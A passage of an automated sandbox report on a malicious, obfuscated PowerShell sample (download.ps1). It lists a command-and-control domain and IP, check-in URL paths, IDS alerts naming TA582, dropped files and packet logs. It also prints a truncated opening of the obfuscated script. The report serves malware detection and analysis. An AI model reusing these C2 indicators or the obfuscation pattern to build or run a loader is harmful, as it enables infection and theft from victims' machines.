                                                    https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000000.00000002.2154207173.000001C010D50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.2191669510.000001C01E6E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E8BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2154207173.000001C00FE0C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E94E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2154207173.000001C011698000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.2154207173.000001C00E909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2154207173.000001C011698000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://contoso.com/Iconpowershell.exe, 00000000.00000002.2191669510.000001C01E753000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://0.googlepowershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.2154207173.000001C011698000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://0.google.powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifXpowershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://0.google.com/powershell.exe, 00000000.00000002.2154207173.000001C00FE67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.2191669510.000001C01E9DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.2154207173.000001C00E909000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.2154207173.000001C010540000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.2154207173.000001C00E6E1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.2154207173.000001C010011000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://oneget.orgpowershell.exe, 00000000.00000002.2154207173.000001C010D50000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.microspowershell.exe, 00000000.00000002.2207809814.000001C026870000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high

                                                                                                                World Map of Contacted IPs

                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs

                                                                                                                Public IPs

                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                45.61.136.138
                                                                                                                		gajaechkfhfghal.topUnited States
                                                                                                                		40676AS40676USfalse
                                                                                                                142.250.181.68
                                                                                                                		www.google.comUnited States
                                                                                                                		15169GOOGLEUSfalse

                                                                                                                General Information

                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1581181
                                                                                                                Start date and time:2024-12-27 07:17:12 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 4m 20s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:6
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:download.ps1
                                                                                                                Detection:MAL
                                                                                                                Classification:mal80.evad.winPS1@2/7@2/2
                                                                                                                EGA Information:Failed
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 100%
                                                                                                                • Number of executed functions: 16
                                                                                                                • Number of non-executed functions: 2
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .ps1

                                                                                                                Warnings

                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7128 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                Simulations

                                                                                                                Behavior and APIs

                                                                                                                TimeTypeDescription
                                                                                                                01:18:06API Interceptor46x Sleep call for process: powershell.exe modified

                                                                                                                Joe Sandbox View / Context

                                                                                                                IPs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/wzlym6vt7ahtr.php?id=computer&key=78042689494&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/roqyfncdwahtr.php?id=user-PC&key=81114521757&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/g458bzp6m1htr.php?id=computer&key=56848542613&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/jzik4w36vshtr.php?id=user-PC&key=35005560655&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/hxe035pvfthtr.php?id=computer&key=72113948934&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/kqubowg9xhhtr.php?id=computer&key=39968631184&s=527
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • gajaechkfhfghal.top/q9lpw6berahtr.php?id=user-PC&key=70313677457&s=527

                                                                                                                Domains

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                gajaechkfhfghal.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138

                                                                                                                ASNs

                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                telnet.ppc.elfGet hashmaliciousUnknownBrowse
                                                                                                                • 45.34.255.95
                                                                                                                armv6l.elfGet hashmaliciousMiraiBrowse
                                                                                                                • 45.34.153.95
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138
                                                                                                                download.ps1Get hashmaliciousUnknownBrowse
                                                                                                                • 45.61.136.138

                                                                                                                JA3 Fingerprints

                                                                                                                No context

                                                                                                                Dropped Files

                                                                                                                No context

                                                                                                                Created / dropped Files

                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):64
                                                                                                                Entropy (8bit):1.1628158735648508
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Nllluldhz/lL:NllU
                                                                                                                MD5:03744CE5681CB7F5E53A02F19FA22067
                                                                                                                SHA1:234FB09010F6714453C83795D8CF3250D871D4DF
                                                                                                                SHA-256:88348573B57BA21639837E3AF19A00B4D7889E2D8E90A923151AC022D2946E5D
                                                                                                                SHA-512:0C05D6047DBA2286F8F72EB69A69919DC5650F96E8EE759BA9B3FC10BE793F3A88408457E700936BCACA02816CE25DD53F48B962491E7F4F0A4A534D88A855E6
                                                                                                                Malicious:false
                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                Preview:@...e.................................L..............@..........

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3snjqncv.mjz.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_blh23vg3.bim.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Reputation:high, very likely benign file
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cslh0ppi.oj4.ps1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xhzuppvd.f3b.psm1

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                Category:dropped
                                                                                                                Size (bytes):60
                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                Malicious:false
                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2SB0CSEF2NXV7N0PVV76.temp

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6222
                                                                                                                Entropy (8bit):3.696755729307633
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:k0btiCybU2K+luPukvhkvklCywJn2PNnZlzhSogZo4vNnZl/hSogZoc1:bpiCPolJkvhkvCCtiNnZiHNNnZOHv
                                                                                                                MD5:172B6256139279D1ADEC92D7059E907F
                                                                                                                SHA1:81E6B0FB021F4354A12FF4832A5790C9827B63BE
                                                                                                                SHA-256:5056294CAA7E3541A9D46C6A2FF04953D156541FE2DECB32B8A2B19A3642103C
                                                                                                                SHA-512:C1FDD3F1BC92F8F6293094EDA2832125C360BD1F535F4438D0B4958BB571B79B7F20403E64BF9160A9191A10672FC27172B8500C26C032A229795468D8900773
                                                                                                                Malicious:false
                                                                                                                Preview:...................................FL..................F.".. ...d......wQw.'X..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......z.'X..@=..'X......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y:2....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y=2..Roaming.@......DWSl.Y=2....C.......................K.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y:2....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y:2....E......................<.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y:2....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y:2....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YC2....q...........

                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                Download File
                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                File Type:data
                                                                                                                Category:dropped
                                                                                                                Size (bytes):6222
                                                                                                                Entropy (8bit):3.696755729307633
                                                                                                                Encrypted:false
                                                                                                                SSDEEP:48:k0btiCybU2K+luPukvhkvklCywJn2PNnZlzhSogZo4vNnZl/hSogZoc1:bpiCPolJkvhkvCCtiNnZiHNNnZOHv
                                                                                                                MD5:172B6256139279D1ADEC92D7059E907F
                                                                                                                SHA1:81E6B0FB021F4354A12FF4832A5790C9827B63BE
                                                                                                                SHA-256:5056294CAA7E3541A9D46C6A2FF04953D156541FE2DECB32B8A2B19A3642103C
                                                                                                                SHA-512:C1FDD3F1BC92F8F6293094EDA2832125C360BD1F535F4438D0B4958BB571B79B7F20403E64BF9160A9191A10672FC27172B8500C26C032A229795468D8900773
                                                                                                                Malicious:false
                                                                                                                Preview:...................................FL..................F.".. ...d......wQw.'X..z.:{.............................:..DG..Yr?.D..U..k0.&...&...... M.......z.'X..@=..'X......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y:2....B.....................Bdg.A.p.p.D.a.t.a...B.V.1......Y=2..Roaming.@......DWSl.Y=2....C.......................K.R.o.a.m.i.n.g.....\.1.....DW.q..MICROS~1..D......DWSl.Y:2....D.....................sy%.M.i.c.r.o.s.o.f.t.....V.1.....DW.r..Windows.@......DWSl.Y:2....E......................<.W.i.n.d.o.w.s.......1.....DWUl..STARTM~1..n......DWSl.Y:2....G...............D......a..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DWWn..Programs..j......DWSl.Y:2....H...............@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......DWSlDWSl....I.....................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......DWSl.YC2....q...........

                                                                                                                Static File Info

                                                                                                                General

                                                                                                                File type:ASCII text, with very long lines (10667), with CRLF line terminators
                                                                                                                Entropy (8bit):6.011445445788151
                                                                                                                TrID:
                                                                                                                  File name:download.ps1
                                                                                                                  File size:19'209 bytes
                                                                                                                  MD5:7dafb41e8fcb07cd512f09a1b29acfba
                                                                                                                  SHA1:74f6e01ccfe06425979abab3777793be1cd02653
                                                                                                                  SHA256:b2081d85f24db02186d3280e7acf429e4fdbe23d98c3543965ec73b7ad4c5e8b
                                                                                                                  SHA512:bc9ad9869603e542caae470e98790c3f39800e23bc63e53df8729a498fa88dd99466f87860d941dd4a857581da1198402581097c497672fbf28bf978006c3d15
                                                                                                                  SSDEEP:384:rHkpqTOAHhvLGR+Yg7by+apz+SWNyoDfIJF+yukFt:rHkATGWW+rDf8Fj1Ft
                                                                                                                  TLSH:7C824CE06384E4D1D4C9895A7A02FC4D7662B07F85CF78D1FB9AE2D632D1381AED4C52
                                                                                                                  File Content Preview:$irsfdojzekanyt=$executioncontext;$oralesaratininestionalalenoronalisat = -join (0..54 | ForEach-Object {[char]([int]"00000140000001390000014400000137000001430000014100000143000001420000014200000137000001430000013500000136000001420000013900000143000001410

                                                                                                                  File Icon

                                                                                                                  Icon Hash:3270d6baae77db44

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-27T07:18:09.003537+01002859405ETPRO MALWARE TA582 Domain in DNS Lookup1192.168.2.5525121.1.1.153UDP
                                                                                                                  2024-12-27T07:18:10.669795+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.54970445.61.136.13880TCP
                                                                                                                  2024-12-27T07:18:10.669795+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.54970445.61.136.13880TCP
                                                                                                                  2024-12-27T07:18:12.644185+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.549705142.250.181.6880TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 27, 2024 07:18:09.153748989 CET4970480192.168.2.545.61.136.138
                                                                                                                  Dec 27, 2024 07:18:09.273523092 CET804970445.61.136.138192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:09.273596048 CET4970480192.168.2.545.61.136.138
                                                                                                                  Dec 27, 2024 07:18:09.283617973 CET4970480192.168.2.545.61.136.138
                                                                                                                  Dec 27, 2024 07:18:09.403090000 CET804970445.61.136.138192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:10.626902103 CET804970445.61.136.138192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:10.669795036 CET4970480192.168.2.545.61.136.138
                                                                                                                  Dec 27, 2024 07:18:10.772842884 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:10.892359972 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:10.892769098 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:10.892837048 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:11.012424946 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644059896 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644078016 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644088984 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644185066 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.644212008 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644223928 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644236088 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644248009 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644257069 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.644260883 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644293070 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.644320011 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.644525051 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644539118 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.644577980 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.764683962 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.764713049 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.764805079 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.855814934 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.855887890 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.856014967 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.860018015 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.860119104 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.860161066 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.868387938 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.870806932 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.870853901 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.870891094 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.879137993 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.879204035 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.879230022 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.887587070 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.887636900 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.889931917 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.890062094 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.890113115 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.898338079 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.899513006 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.899553061 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.899609089 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.907928944 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.907993078 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.909147978 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.909197092 CET8049705142.250.181.68192.168.2.5
                                                                                                                  Dec 27, 2024 07:18:12.909236908 CET4970580192.168.2.5142.250.181.68
                                                                                                                  Dec 27, 2024 07:18:12.917515993 CET8049705142.250.181.68192.168.2.5
